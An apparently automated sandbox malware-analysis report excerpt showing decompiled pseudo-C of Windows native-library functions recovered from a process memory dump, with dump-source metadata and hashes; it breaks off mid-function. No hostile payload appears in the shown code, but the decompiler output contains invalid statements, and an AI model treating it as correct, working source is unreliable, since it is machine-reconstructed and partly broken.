                                                                                                                                  E010E03E2(signed int __ecx, signed int __edx) { 				signed int _v8; 				signed int _v12; 				signed int _v16; 				signed int _v20; 				signed int _v24; 				signed int _v28; 				signed int _v32; 				signed int _v36; 				intOrPtr _v40; 				signed int _v44; 				signed int _v48; 				char _v52; 				char _v56; 				char _v64; 				void* __ebx; 				void* __edi; 				void* __esi; 				signed int _t56; 				signed int _t58; 				char* _t64; 				intOrPtr _t65; 				signed int _t74; 				signed int _t79; 				char* _t83; 				intOrPtr _t84; 				signed int _t93; 				signed int _t94; 				signed char* _t95; 				signed int _t99; 				signed int _t100; 				signed char* _t101; 				signed int _t105; 				signed int _t119; 				signed int _t120; 				void* _t122; 				signed int _t123; 				signed int _t127;  				_v8 =  *0x11ad360 ^ _t127; 				_t119 = __ecx; 				_t105 = __edx; 				_t118 = 0; 				_v20 = __edx; 				_t120 =  *(__ecx + 0x20); 				if(E010E0548(__ecx, 0) != 0) { 					_t56 = 0xc000022d; 					L23: 					return E010FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120); 				} else { 					_v12 = _v12 | 0xffffffff; 					_t58 = _t120 + 0x24; 					_t109 =  *(_t120 + 0x18); 					_t118 = _t58; 					_v16 = _t58; 					E010CB02A( *(_t120 + 0x18), _t118, 0x14a5); 					_v52 = 0x18; 					_v48 = 0; 					0x840 = 0x40; 					if( *0x11a7c1c != 0) { 					} 					_v40 = 0x840; 					_v44 = _t105; 					_v36 = 0; 					_v32 = 0; 					if(E010D7D50() != 0) { 						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 					} else { 						_t64 = 0x7ffe0384; 					} 					if( *_t64 != 0) { 						_t65 =  *[fs:0x30]; 						__eflags =  *(_t65 + 0x240) & 0x00000004; 						if(( *(_t65 + 0x240) & 0x00000004) != 0) { 							_t100 = E010D7D50(); 							__eflags = _t100; 							if(_t100 == 0) { 								_t101 = 0x7ffe0385; 							} else { 								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; 							} 		
					__eflags =  *_t101 & 0x00000020; 							if(( *_t101 & 0x00000020) != 0) { 								_t118 = _t118 | 0xffffffff; 								_t109 = 0x1485; 								E01137016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0); 							} 						} 					} 					_t105 = 0; 					while(1) { 						_push(0x60); 						_push(5); 						_push( &_v64); 						_push( &_v52); 						_push(0x100021); 						_push( &_v12); 						_t122 = E010F9830(); 						if(_t122 >= 0) { 							break; 						} 						__eflags = _t122 - 0xc0000034; 						if(_t122 == 0xc0000034) { 							L38: 							_t120 = 0xc0000135; 							break; 						} 						__eflags = _t122 - 0xc000003a; 						if(_t122 == 0xc000003a) { 							goto L38; 						} 						__eflags = _t122 - 0xc0000022; 						if(_t122 != 0xc0000022) { 							break; 						} 						__eflags = _t105; 						if(__eflags != 0) { 							break; 						} 						_t109 = _t119; 						_t99 = E011369A6(_t119, __eflags); 						__eflags = _t99; 						if(_t99 == 0) { 							break; 						} 						_t105 = _t105 + 1; 					} 					if( !_t120 >= 0) { 						L22: 						_t56 = _t120; 						goto L23; 					} 					if( *0x11a7c04 != 0) { 						_t118 = _v12; 						_t120 = E0113A7AC(_t119, _t118, _t109); 						__eflags = _t120; 						if(_t120 >= 0) { 							goto L10; 						} 						__eflags =  *0x11a7bd8; 						if( *0x11a7bd8 != 0) { 							L20: 							if(_v12 != 0xffffffff) { 								_push(_v12); 								E010F95D0(); 							} 							goto L22; 						} 					} 					L10: 					_push(_v12); 					_t105 = _t119 + 0xc; 					_push(0x1000000); 					_push(0x10); 					_push(0); 					_push(0); 					_push(0xf); 					_push(_t105); 					_t120 = E010F99A0(); 					if(_t120 < 0) { 						__eflags = _t120 - 0xc000047e; 						if(_t120 == 0xc000047e) { 							L51: 							_t74 = E01133540(_t120); 							_t119 = _v16; 							_t120 = _t74; 							L52: 							_t118 = 0x1485; 							E010BB1E1(_t120, 0x1485, 0, _t119); 							goto L20; 						} 						__eflags = _t120 - 0xc000047f; 						if(_t120 == 0xc000047f) { 							goto L51; 						} 						
__eflags = _t120 - 0xc0000462; 						if(_t120 == 0xc0000462) { 							goto L51; 						} 						_t119 = _v16; 						__eflags = _t120 - 0xc0000017; 						if(_t120 != 0xc0000017) { 							__eflags = _t120 - 0xc000009a; 							if(_t120 != 0xc000009a) { 								__eflags = _t120 - 0xc000012d; 								if(_t120 != 0xc000012d) { 									_v28 = _t119; 									_push( &_v56); 									_push(1); 									_v24 = _t120; 									_push( &_v28); 									_push(1); 									_push(2); 									_push(0xc000007b); 									_t79 = E010FAAF0(); 									__eflags = _t79; 									if(_t79 >= 0) { 										__eflags =  *0x11a8474 - 3; 										if( *0x11a8474 != 3) { 											 *0x11a79dc =  *0x11a79dc + 1; 										} 									} 								} 							} 						} 						goto L52; 					} 					if(E010D7D50() != 0) { 						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 					} else { 						_t83 = 0x7ffe0384; 					} 					if( *_t83 != 0) { 						_t84 =  *[fs:0x30]; 						__eflags =  *(_t84 + 0x240) & 0x00000004; 						if(( *(_t84 + 0x240) & 0x00000004) != 0) { 							_t94 = E010D7D50(); 							__eflags = _t94; 							if(_t94 == 0) { 								_t95 = 0x7ffe0385; 							} else { 								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; 							} 							__eflags =  *_t95 & 0x00000020; 							if(( *_t95 & 0x00000020) != 0) { 								E01137016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0); 							} 						} 					} 					if(( *(_t119 + 0x10) & 0x00000100) == 0) { 						if( *0x11a8708 != 0) { 							_t118 =  *0x7ffe0330; 							_t123 =  *0x11a7b00; // 0x0 							asm("ror esi, cl"); 							 *0x11ab1e0(_v12, _v20, 0x20); 							_t93 =  *(_t123 ^  *0x7ffe0330)(); 							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb 							asm("sbb esi, esi"); 							_t120 =  ~_t50 & _t93; 						} else { 							_t120 = 0; 						} 					} 					if( !_t120 >= 0) { 						L19: 						_push( *_t105); 						E010F95D0(); 						 *_t105 =  *_t105 & 0x00000000; 						goto L20; 					} 					_t120 = E010C7F65(_t119); 					if( *((intOrPtr*)(_t119 + 
0x60)) != 0) { 						__eflags = _t120; 						if(_t120 < 0) { 							goto L19; 						} 						 *(_t119 + 0x64) = _v12; 						goto L22; 					} 					goto L19; 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • Opcode ID: c837c16d186cf2cf9701429a11ab136daa8ea46f049b36095a1d868b9da10ce4
                                                                            • Instruction ID: 6fa2a94a2b2351152cfef6d3b798d9044bc54977822c612169b013a31e962b64
                                                                            • Opcode Fuzzy Hash: c837c16d186cf2cf9701429a11ab136daa8ea46f049b36095a1d868b9da10ce4
                                                                            • Instruction Fuzzy Hash: 22917E71F002299FEB359B6DC848BAE7FE0AF01724F050265FA90AB6D5DBB49D50C781
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                                                                                  E010BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) { 				signed int _v8; 				char _v1036; 				signed int _v1040; 				char _v1048; 				signed int _v1052; 				signed char _v1056; 				void* _v1058; 				char _v1060; 				signed int _v1064; 				void* _v1068; 				intOrPtr _v1072; 				void* _v1084; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				intOrPtr _t70; 				intOrPtr _t72; 				signed int _t74; 				intOrPtr _t77; 				signed int _t78; 				signed int _t81; 				void* _t101; 				signed int _t102; 				signed int _t107; 				signed int _t109; 				signed int _t110; 				signed char _t111; 				signed int _t112; 				signed int _t113; 				signed int _t114; 				intOrPtr _t116; 				void* _t117; 				char _t118; 				void* _t120; 				char _t121; 				signed int _t122; 				signed int _t123; 				signed int _t125;  				_t125 = (_t123 & 0xfffffff8) - 0x424; 				_v8 =  *0x11ad360 ^ _t125; 				_t116 = _a4; 				_v1056 = _a16; 				_v1040 = _a24; 				if(E010C6D30( &_v1048, _a8) < 0) { 					L4: 					_pop(_t117); 					_pop(_t120); 					_pop(_t101); 					return E010FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120); 				} 				_t70 = _a20; 				if(_t70 >= 0x3f4) { 					_t121 = _t70 + 0xc; 					L19: 					_t107 =  *( *[fs:0x30] + 0x18); 					__eflags = _t107; 					if(_t107 == 0) { 						L60: 						_t68 = 0xc0000017; 						goto L4; 					} 					_t72 =  *0x11a7b9c; // 0x0 					_t74 = L010D4620(_t107, _t107, _t72 + 0x180000, _t121); 					_v1064 = _t74; 					__eflags = _t74; 					if(_t74 == 0) { 						goto L60; 					} 					_t102 = _t74; 					_push( &_v1060); 					_push(_t121); 					_push(_t74); 					_push(2); 					_push( &_v1048); 					_push(_t116); 					_t122 = E010F9650(); 					__eflags = _t122; 					if(_t122 >= 0) { 						L7: 						_t114 = _a12; 						__eflags = _t114; 						if(_t114 != 0) { 						
	_t77 = _a20; 							L26: 							_t109 =  *(_t102 + 4); 							__eflags = _t109 - 3; 							if(_t109 == 3) { 								L55: 								__eflags = _t114 - _t109; 								if(_t114 != _t109) { 									L59: 									_t122 = 0xc0000024; 									L15: 									_t78 = _v1052; 									__eflags = _t78; 									if(_t78 != 0) { 										L010D77F0( *( *[fs:0x30] + 0x18), 0, _t78); 									} 									_t68 = _t122; 									goto L4; 								} 								_t110 = _v1056; 								_t118 =  *((intOrPtr*)(_t102 + 8)); 								_v1060 = _t118; 								__eflags = _t110; 								if(_t110 == 0) { 									L10: 									_t122 = 0x80000005; 									L11: 									_t81 = _v1040; 									__eflags = _t81; 									if(_t81 == 0) { 										goto L15; 									} 									__eflags = _t122; 									if(_t122 >= 0) { 										L14: 										 *_t81 = _t118; 										goto L15; 									} 									__eflags = _t122 - 0x80000005; 									if(_t122 != 0x80000005) { 										goto L15; 									} 									goto L14; 								} 								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77; 								if( *((intOrPtr*)(_t102 + 8)) > _t77) { 									goto L10; 								} 								_push( *((intOrPtr*)(_t102 + 8))); 								_t59 = _t102 + 0xc; // 0xc 								_push(_t110); 								L54: 								E010FF3E0(); 								_t125 = _t125 + 0xc; 								goto L11; 							} 							__eflags = _t109 - 7; 							if(_t109 == 7) { 								goto L55; 							} 							_t118 = 4; 							__eflags = _t109 - _t118; 							if(_t109 != _t118) { 								__eflags = _t109 - 0xb; 								if(_t109 != 0xb) { 									__eflags = _t109 - 1; 									if(_t109 == 1) { 										__eflags = _t114 - _t118; 										if(_t114 != _t118) { 											_t118 =  *((intOrPtr*)(_t102 + 8)); 											_v1060 = _t118; 											__eflags = _t118 - _t77; 											if(_t118 > _t77) { 												goto L10; 											} 											_push(_t118); 											_t56 = _t102 + 0xc; // 0xc 											_push(_v1056); 											goto L54; 										} 										__eflags = _t77 - _t118; 						
				if(_t77 != _t118) { 											L34: 											_t122 = 0xc0000004; 											goto L15; 										} 										_t111 = _v1056; 										__eflags = _t111 & 0x00000003; 										if((_t111 & 0x00000003) == 0) { 											_v1060 = _t118; 											__eflags = _t111; 											if(__eflags == 0) { 												goto L10; 											} 											_t42 = _t102 + 0xc; // 0xc 											 *((intOrPtr*)(_t125 + 0x20)) = _t42; 											_v1048 =  *((intOrPtr*)(_t102 + 8)); 											_push(_t111); 											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8)); 											_push(0); 											_push( &_v1048); 											_t122 = E010F13C0(_t102, _t118, _t122, __eflags); 											L44: 											_t118 = _v1072; 											goto L11; 										} 										_t122 = 0x80000002; 										goto L15; 									} 									_t122 = 0xc0000024; 									goto L44; 								} 								__eflags = _t114 - _t109; 								if(_t114 != _t109) { 									goto L59; 								} 								_t118 = 8; 								__eflags = _t77 - _t118; 								if(_t77 != _t118) { 									goto L34; 								} 								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118; 								if( *((intOrPtr*)(_t102 + 8)) != _t118) { 									goto L34; 								} 								_t112 = _v1056; 								_v1060 = _t118; 								__eflags = _t112; 								if(_t112 == 0) { 									goto L10; 								} 								 *_t112 =  *((intOrPtr*)(_t102 + 0xc)); 								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10)); 								goto L11; 							} 							__eflags = _t114 - _t118; 							if(_t114 != _t118) { 								goto L59; 							} 							__eflags = _t77 - _t118; 							if(_t77 != _t118) { 								goto L34; 							} 							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118; 							if( *((intOrPtr*)(_t102 + 8)) != _t118) { 								goto L34; 							} 							_t113 = _v1056; 							_v1060 = _t118; 							__eflags = _t113; 							if(_t113 == 0) { 								goto L10; 							} 							 *_t113 =  *((intOrPtr*)(_t102 + 0xc)); 							goto L11; 						} 						_t118 =  
*((intOrPtr*)(_t102 + 8)); 						__eflags = _t118 - _a20; 						if(_t118 <= _a20) { 							_t114 =  *(_t102 + 4); 							_t77 = _t118; 							goto L26; 						} 						_v1060 = _t118; 						goto L10; 					} 					__eflags = _t122 - 0x80000005; 					if(_t122 != 0x80000005) { 						goto L15; 					} 					L010D77F0( *( *[fs:0x30] + 0x18), 0, _t102); 					L18: 					_t121 = _v1060; 					goto L19; 				} 				_push( &_v1060); 				_push(0x400); 				_t102 =  &_v1036; 				_push(_t102); 				_push(2); 				_push( &_v1048); 				_push(_t116); 				_t122 = E010F9650(); 				if(_t122 >= 0) { 					__eflags = 0; 					_v1052 = 0; 					goto L7; 				} 				if(_t122 == 0x80000005) { 					goto L18; 				} 				goto L4; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a6aacf43dee15ac071a2332ff09a101d70f05f816c4508d89502a55fcca240d
                                                                            • Instruction ID: f663210e012d0b94035c71e870153c30711a17b8024b7cbb899ff46047e06155
                                                                            • Opcode Fuzzy Hash: 2a6aacf43dee15ac071a2332ff09a101d70f05f816c4508d89502a55fcca240d
                                                                            • Instruction Fuzzy Hash: 658195756043118BDB2ACE58C881B7B77E4FBA4364F19486EEE459B281E330DD50CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E01136DC9(signed int __ecx, void* __edx) { 				unsigned int _v8; 				intOrPtr _v12; 				signed int _v16; 				intOrPtr _v20; 				intOrPtr _v24; 				intOrPtr _v28; 				char _v32; 				char _v36; 				char _v40; 				char _v44; 				char _v48; 				char _v52; 				char _v56; 				char _v60; 				void* _t87; 				void* _t95; 				signed char* _t96; 				signed int _t107; 				signed int _t136; 				signed char* _t137; 				void* _t157; 				void* _t161; 				void* _t167; 				intOrPtr _t168; 				void* _t174; 				void* _t175; 				signed int _t176; 				void* _t177;  				_t136 = __ecx; 				_v44 = 0; 				_t167 = __edx; 				_v40 = 0; 				_v36 = 0; 				_v32 = 0; 				_v60 = 0; 				_v56 = 0; 				_v52 = 0; 				_v48 = 0; 				_v16 = __ecx; 				_t87 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248); 				_t175 = _t87; 				if(_t175 != 0) { 					_t11 = _t175 + 0x30; // 0x30 					 *((short*)(_t175 + 6)) = 0x14d4; 					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10)); 					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc)); 					 *((intOrPtr*)(_t175 + 0x28)) = _t136; 					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14)); 					E01136B4C(_t167, _t11, 0x214,  &_v8); 					_v12 = _v8 + 0x10; 					_t95 = E010D7D50(); 					_t137 = 0x7ffe0384; 					if(_t95 == 0) { 						_t96 = 0x7ffe0384; 					} else { 						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 					} 					_push(_t175); 					_push(_v12); 					_push(0x402); 					_push( *_t96 & 0x000000ff); 					E010F9AE0(); 					_t87 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175); 					_t176 = _v16; 					if((_t176 & 0x00000100) != 0) { 						_push( &_v36); 						_t157 = 4; 						_t87 = E0113795D( *((intOrPtr*)(_t167 + 8)), _t157); 						if(_t87 >= 0) { 							_v24 = E0113795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44); 							_v28 = E0113795D( 
*((intOrPtr*)(_t167 + 8)), 0,  &_v60); 							_push( &_v52); 							_t161 = 5; 							_t168 = E0113795D( *((intOrPtr*)(_t167 + 8)), _t161); 							_v20 = _t168; 							_t107 = L010D4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0); 							_v16 = _t107; 							if(_t107 != 0) { 								_v8 = _v8 & 0x00000000; 								 *(_t107 + 0x20) = _t176; 								 *((short*)(_t107 + 6)) = 0x14d5; 								_t47 = _t107 + 0x24; // 0x24 								_t177 = _t47; 								E01136B4C( &_v36, _t177, 0xc78,  &_v8); 								_t51 = _v8 + 4; // 0x4 								_t178 = _t177 + (_v8 >> 1) * 2; 								_v12 = _t51; 								E01136B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8); 								_v12 = _v12 + _v8; 								E01136B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8); 								_t125 = _v8; 								_v12 = _v12 + _v8; 								E01136B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8); 								_t174 = _v12 + _v8; 								if(E010D7D50() != 0) { 									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 								} 								_push(_v16); 								_push(_t174); 								_push(0x402); 								_push( *_t137 & 0x000000ff); 								E010F9AE0(); 								L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16); 								_t168 = _v20; 							} 							_t87 = L010D2400( &_v36); 							if(_v24 >= 0) { 								_t87 = L010D2400( &_v44); 							} 							if(_t168 >= 0) { 								_t87 = L010D2400( &_v52); 							} 							if(_v28 >= 0) { 								return L010D2400( &_v60); 							} 						} 					} 				} 				return _t87; 			}                        

                                                                            0x01136f77
                                                                            0x01136f7c
                                                                            0x01136f82
                                                                            0x01136f91
                                                                            0x01136f99
                                                                            0x01136fa3
                                                                            0x01136fae
                                                                            0x01136fae
                                                                            0x01136fba
                                                                            0x01136fbb
                                                                            0x01136fbc
                                                                            0x01136fc1
                                                                            0x01136fc2
                                                                            0x01136fd3
                                                                            0x01136fd8
                                                                            0x01136fd8
                                                                            0x01136fdf
                                                                            0x01136fe8
                                                                            0x01136fee
                                                                            0x01136fee
                                                                            0x01136ff5
                                                                            0x01136ffb
                                                                            0x01136ffb
                                                                            0x01137004
                                                                            0x00000000
                                                                            0x0113700a
                                                                            0x01137004
                                                                            0x01136eb3
                                                                            0x01136e9c
                                                                            0x01137015

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                            • Instruction ID: 4688730ff6b0a772967c475a2945fb8fb2ed3859bba09ec8af0bd3a414e00be0
                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                            • Instruction Fuzzy Hash: E2718F71A00219EFCB15DFA9C984AEEFBB9FF88714F104169E505E7294DB30EA41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 39%
                                                                                                                                  E0114B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) { 				char _v8; 				signed int _v12; 				signed int _t80; 				signed int _t83; 				intOrPtr _t89; 				signed int _t92; 				signed char _t106; 				signed int* _t107; 				intOrPtr _t108; 				intOrPtr _t109; 				signed int _t114; 				void* _t115; 				void* _t117; 				void* _t119; 				void* _t122; 				signed int _t123; 				signed int* _t124;  				_t106 = _a12; 				if((_t106 & 0xfffffffc) != 0) { 					return 0xc000000d; 				} 				if((_t106 & 0x00000002) != 0) { 					_t106 = _t106 | 0x00000001; 				} 				_t109 =  *0x11a7b9c; // 0x0 				_t124 = L010D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc); 				if(_t124 != 0) { 					 *_t124 =  *_t124 & 0x00000000; 					_t124[1] = _t124[1] & 0x00000000; 					_t124[4] = _t124[4] & 0x00000000; 					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) { 						L13: 						_push(_t124); 						if((_t106 & 0x00000002) != 0) { 							_push(0x200); 							_push(0x28); 							_push(0xffffffff); 							_t122 = E010F9800(); 							if(_t122 < 0) { 								L33: 								if((_t124[4] & 0x00000001) != 0) { 									_push(4); 									_t64 =  &(_t124[1]); // 0x4 									_t107 = _t64; 									_push(_t107); 									_push(5); 									_push(0xfffffffe); 									E010F95B0(); 									if( *_t107 != 0) { 										_push( *_t107); 										E010F95D0(); 									} 								} 								_push(_t124); 								_push(0); 								_push( *((intOrPtr*)( *[fs:0x30] + 0x18))); 								L37: 								L010D77F0(); 								return _t122; 							} 							_t124[4] = _t124[4] | 0x00000002; 							L18: 							_t108 = _a8; 							_t29 =  &(_t124[0x105]); // 0x414 							_t80 = _t29; 							_t30 =  &(_t124[5]); // 0x14 							_t124[3] = _t80; 							_t123 = 0; 							_t124[2] = _t30; 							 *_t80 = _t108; 							
if(_t108 == 0) { 								L21: 								_t112 = 0x400; 								_push( &_v8); 								_v8 = 0x400; 								_push(_t124[2]); 								_push(0x400); 								_push(_t124[3]); 								_push(0); 								_push( *_t124); 								_t122 = E010F9910(); 								if(_t122 != 0xc0000023) { 									L26: 									if(_t122 != 0x106) { 										L40: 										if(_t122 < 0) { 											L29: 											_t83 = _t124[2]; 											if(_t83 != 0) { 												_t59 =  &(_t124[5]); // 0x14 												if(_t83 != _t59) { 													L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83); 												} 											} 											_push( *_t124); 											E010F95D0(); 											goto L33; 										} 										 *_a16 = _t124; 										return 0; 									} 									if(_t108 != 1) { 										_t122 = 0; 										goto L40; 									} 									_t122 = 0xc0000061; 									goto L29; 								} else { 									goto L22; 								} 								while(1) { 									L22: 									_t89 =  *0x11a7b9c; // 0x0 									_t92 = L010D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8); 									_t124[2] = _t92; 									if(_t92 == 0) { 										break; 									} 									_t112 =  &_v8; 									_push( &_v8); 									_push(_t92); 									_push(_v8); 									_push(_t124[3]); 									_push(0); 									_push( *_t124); 									_t122 = E010F9910(); 									if(_t122 != 0xc0000023) { 										goto L26; 									} 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]); 								} 								_t122 = 0xc0000017; 								goto L26; 							} 							_t119 = 0; 							do { 								_t114 = _t124[3]; 								_t119 = _t119 + 0xc; 								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4)); 								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000; 								_t123 = _t123 + 1; 								 *((intOrPtr*)(_t124[3] + _t119)) = 2; 							} while (_t123 < _t108); 							goto L21; 						} 						_push(0x28); 						_push(3); 						_t122 = E010BA7B0(); 						if(_t122 < 0) { 							
goto L33; 						} 						_t124[4] = _t124[4] | 0x00000001; 						goto L18; 					} 					if((_t106 & 0x00000001) == 0) { 						_t115 = 0x28; 						_t122 = E0114E7D3(_t115, _t124); 						if(_t122 < 0) { 							L9: 							_push(_t124); 							_push(0); 							_push( *((intOrPtr*)( *[fs:0x30] + 0x18))); 							goto L37; 						} 						L12: 						if( *_t124 != 0) { 							goto L18; 						} 						goto L13; 					} 					_t15 =  &(_t124[1]); // 0x4 					_t117 = 4; 					_t122 = E0114E7D3(_t117, _t15); 					if(_t122 >= 0) { 						_t124[4] = _t124[4] | 0x00000001; 						_v12 = _v12 & 0x00000000; 						_push(4); 						_push( &_v12); 						_push(5); 						_push(0xfffffffe); 						E010F95B0(); 						goto L12; 					} 					goto L9; 				} else { 					return 0xc0000017; 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70d21a75a5c49d930206704d03d03863db7e1e4cf28c290d73239274057cf290
                                                                            • Instruction ID: 2034d695efc679cbbaa3f85bd43bc2aa452531b34ae8102ceb4b19bc10d24b60
                                                                            • Opcode Fuzzy Hash: 70d21a75a5c49d930206704d03d03863db7e1e4cf28c290d73239274057cf290
                                                                            • Instruction Fuzzy Hash: D3713472204702EFE739CF18C845F96BBE5EF44B20F214928E695876A0EB75E941CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) { 				signed short* _v8; 				signed short* _v12; 				intOrPtr _v16; 				intOrPtr _v20; 				intOrPtr _v24; 				intOrPtr* _v28; 				signed int _v32; 				signed int _v36; 				short _t56; 				signed int _t57; 				intOrPtr _t58; 				signed short* _t61; 				intOrPtr _t72; 				intOrPtr _t75; 				intOrPtr _t84; 				intOrPtr _t87; 				intOrPtr* _t90; 				signed short* _t91; 				signed int _t95; 				signed short* _t96; 				intOrPtr _t97; 				intOrPtr _t102; 				signed int _t108; 				intOrPtr _t110; 				signed int _t111; 				signed short* _t112; 				void* _t113; 				signed int _t116; 				signed short** _t119; 				short* _t120; 				signed int _t123; 				signed int _t124; 				void* _t125; 				intOrPtr _t127; 				signed int _t128;  				_t90 = __ecx; 				_v16 = __edx; 				_t108 = _a4; 				_v28 = __ecx; 				_t4 = _t108 - 1; // -1 				if(_t4 > 0x13) { 					L15: 					_t56 = 0xc0000100; 					L16: 					return _t56; 				} 				_t57 = _t108 * 0x1c; 				_v32 = _t57; 				_t6 = _t57 + 0x11a8204; // 0x0 				_t123 =  *_t6; 				_t7 = _t57 + 0x11a8208; // 0x11a8207 				_t8 = _t57 + 0x11a8208; // 0x11a8207 				_t119 = _t8; 				_v36 = _t123; 				_t110 = _t7 + _t123 * 8; 				_v24 = _t110; 				_t111 = _a4; 				if(_t119 >= _t110) { 					L12: 					if(_t123 != 3) { 						_t58 =  *0x11a8450; // 0x5e17ec 						if(_t58 == 0) { 							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48)); 						} 					} else { 						_t26 = _t57 + 0x11a821c; // 0x0 						_t58 =  *_t26; 					} 					 *_t90 = _t58; 					goto L15; 				} else { 					goto L2; 				} 				while(1) { 					_t116 =  *_t61 & 0x0000ffff; 					_t128 =  *(_t127 + _t61) & 0x0000ffff; 					if(_t116 == _t128) { 						goto L18; 					} 					L5: 					if(_t116 >= 0x61) { 						if(_t116 > 0x7a) { 							_t97 =  
